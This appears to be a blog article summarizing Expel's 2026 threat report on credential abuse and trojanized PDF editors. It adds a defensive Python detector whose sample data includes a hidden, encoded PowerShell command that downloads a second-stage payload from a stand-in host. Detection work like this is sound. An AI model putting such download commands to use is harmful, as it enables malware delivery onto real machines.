Expel Publishes Threat Report Analyzing 2025 Security Alerts


Cybersecurity firm Expel recently published its 2026 Threat Report, which analyzed over 1,000,000 alerts in its Security Operations Center throughout 2025. The results showed that threat actors continue to use compromised credentials to gain access to company systems. The Report highlights the need for companies to educate their employees on an ongoing basis about how important it is to protect their usernames and passwords and to be highly vigilant when asked to divulge them.

According to the Report, more than 68% of reported incidents were identity-based, meaning a threat actor attempted to use an authorized user’s credentials to access a company’s network. Many of these logons used user agents that the organization had not authorized, a clear indication that it was not the authorized user trying to log on. In addition, 12% of incidents involved a logon from a suspicious location, showing that companies may wish to monitor and block any logon attempts from unauthorized locations, including foreign countries.

The Report notes that “fake PDF editors continue to be a major problem.” If a user does not have access to a company-sanctioned PDF editor, the user may search the Internet for one to make editing a PDF for a project easier. A user who downloads a fake PDF editor like SupremePDF is unaware that it can “install backdoors, hijack users’ browsers, access stored credentials, execute arbitrary code, intercept sensitive information, and download arbitrary payloads.”

According to Expel,

these “PDF editors” are actually trojans, which use their safe-looking outer shell to establish a foothold on your endpoints. The malware maintains persistence, making sure that the software creates a service that runs on the endpoint, keeping the PDF editor running. We often see these editors then used as a backdoor to run malicious code on the host, commonly abusing encoded PowerShell to download a second payload.

Once the threat actor downloads the second payload, it can then move laterally on the network and steal data. Companies may wish to consider providing a sanctioned PDF editor so users are not tempted to find one on the Internet. This is another security tip to pass along, as many unsuspecting users have no idea that threat actors use these tools to gain access to a network.
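As an added example (not code from Expel’s report or from this article), the signals described above, sign-ins with user agents or locations the organization has not sanctioned and encoded PowerShell launched by a non-sanctioned parent such as a fake PDF editor, can be turned into simple detection logic over sign-in and process-creation telemetry. The sanctioned agent prefixes, allowed countries, parent paths and all sample events are constructed assumptions for illustration.

```python
import base64
import re

# Assumed organizational baselines (illustrative, not from the report).
SANCTIONED_AGENT_PREFIXES = ("Mozilla/5.0",)          # browsers the org issues
ALLOWED_COUNTRIES = {"US"}                             # where staff are expected to sign in from
SANCTIONED_PS_PARENTS = {r"c:\windows\explorer.exe"}   # parents allowed to spawn PowerShell

# Constructed sample telemetry (not real data).
SIGNIN_EVENTS = [
    {"user": "alice", "user_agent": "Mozilla/5.0 (Windows NT 10.0) Chrome/120", "country": "US"},
    {"user": "bob",   "user_agent": "python-requests/2.31",                     "country": "US"},
    {"user": "carol", "user_agent": "Mozilla/5.0 (Windows NT 10.0) Chrome/120", "country": "RU"},
]
PROCESS_EVENTS = [
    {"parent": r"C:\Program Files\SupremePDF\SupremePDF.exe",   # fake editor acting as a backdoor
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + base64.b64encode(
         "Invoke-WebRequest -Uri http://example.invalid/stage2".encode("utf-16le")).decode()},
    {"parent": r"C:\Windows\explorer.exe", "cmdline": "powershell.exe -File backup.ps1"},
]

# PowerShell accepts -EncodedCommand and its abbreviations; the argument is base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def flag_signins(events, agent_prefixes=SANCTIONED_AGENT_PREFIXES, countries=ALLOWED_COUNTRIES):
    """Return one finding per sign-in that uses an unsanctioned agent or an unexpected country."""
    findings = []
    for ev in events:
        if not ev["user_agent"].startswith(agent_prefixes):
            findings.append({"user": ev["user"], "reason": "unauthorized agent"})
        if ev["country"] not in countries:
            findings.append({"user": ev["user"], "reason": "suspicious location"})
    return findings

def decode_encoded_powershell(cmdline):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):   # malformed base64 or odd-length UTF-16 payload
        return None

def flag_processes(events, sanctioned_parents=SANCTIONED_PS_PARENTS):
    """Flag encoded PowerShell spawned by a parent outside the sanctioned set, with the decoded script."""
    findings = []
    for ev in events:
        script = decode_encoded_powershell(ev["cmdline"])
        if script is not None and ev["parent"].lower() not in sanctioned_parents:
            findings.append({"parent": ev["parent"], "decoded": script})
    return findings

if __name__ == "__main__":
    print(flag_signins(SIGNIN_EVENTS), flag_processes(PROCESS_EVENTS))
```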

If you haven’t scheduled your annual cybersecurity training yet, now is the time. There are new (and old) schemes that threat actors are using to attack users, and keeping your employees abreast of these schemes heightens their awareness and vigilance, which protects company data.
